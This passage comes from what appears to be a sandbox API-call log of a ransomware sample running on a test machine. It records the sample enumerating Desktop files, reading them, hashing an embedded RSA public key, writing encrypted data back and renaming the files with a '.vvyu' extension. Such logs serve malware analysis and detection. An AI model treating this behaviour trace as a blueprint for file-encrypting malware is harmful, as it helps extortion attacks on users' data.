hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93768 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2e9ec78 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0192.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936d8 | out: hHeap=0x620000) returned 1 [0192.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2e9ee90 [0192.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0192.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0192.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0192.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0192.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0192.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0192.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ec78 | out: hHeap=0x620000) returned 1 [0192.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee90 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936c0 | out: hHeap=0x620000) returned 1 [0192.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a80 | out: hHeap=0x620000) returned 1 [0192.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0192.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0192.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936a8 | out: hHeap=0x620000) returned 1 [0192.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95530 | out: hHeap=0x620000) returned 1 [0192.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0192.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa28 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0192.885] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x16ae1, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x16ae1, lpOverlapped=0x0) returned 1 [0192.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0192.887] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x16ae6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.887] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0192.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0192.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2e9ea68 [0192.888] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2e9ea68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0192.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2e9ee98 [0192.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.888] WriteFile (in: hFile=0x568, lpBuffer=0x2e9ee98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e9ee98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0192.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ee98 | out: hHeap=0x620000) returned 1 [0192.889] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0192.889] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0192.889] CloseHandle (hObject=0x568) returned 1 [0192.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0192.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2e9ea68 [0192.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0192.894] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\QYjbm5MiXLG2.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\qyjbm5mixlg2.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\QYjbm5MiXLG2.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\qyjbm5mixlg2.mp3.vvyu")) returned 1 [0192.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.895] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0192.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4658 | out: hHeap=0x620000) returned 1 [0192.898] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbedbc90, ftCreationTime.dwHighDateTime=0x1d8a1b4, ftLastAccessTime.dwLowDateTime=0x31ba6940, ftLastAccessTime.dwHighDateTime=0x1d8a324, ftLastWriteTime.dwLowDateTime=0x31ba6940, ftLastWriteTime.dwHighDateTime=0x1d8a324, nFileSizeHigh=0x0, nFileSizeLow=0xfd37, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDY1PliN5xV7.mp4", cAlternateFileName="RDY1PL~1.MP4")) returned 1 [0192.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95530 [0192.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4658 [0192.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95530 | out: hHeap=0x620000) returned 1 [0192.898] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\RDY1PliN5xV7.mp4") returned=".mp4" [0192.899] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\RDY1PliN5xV7.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\rdy1plin5xv7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0192.899] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=64823) returned 1 [0192.899] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0192.902] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xfd11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0192.902] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0192.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.904] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0192.904] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xfd37, lpOverlapped=0x0) returned 1 [0192.904] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0192.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.905] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0192.905] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0192.906] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0192.906] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0192.906] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0192.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0192.906] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0192.906] GetLastError () returned 0x0 [0192.906] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0192.906] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0192.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0192.907] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0192.907] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0192.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.907] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0192.907] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0192.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0192.907] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd40) returned 0x2ea79b0 [0192.907] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0192.908] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95530 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936a8 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95578 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936c0 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93708 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0192.908] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0192.909] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0192.909] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2e9ea68 [0192.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0192.909] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9ea68 | out: hHeap=0x620000) returned 1 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2c936f0 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0192.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0192.910] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93708 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c936f0 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93750 | out: hHeap=0x620000) returned 1 [0192.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0192.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0192.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0192.912] GetCurrentThreadId () returned 0x66c [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x64ea40 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e93a80 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0192.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.913] GetCurrentThreadId () returned 0x66c [0192.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0192.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0192.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0192.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0192.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa28 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93750 [0192.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0192.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936f0 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93708 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c936d8 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93768 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93738 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0192.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2c93720 [0192.915] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93780 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93720 | out: hHeap=0x620000) returned 1 [0192.916] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2c93720 [0192.916] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c93738 | 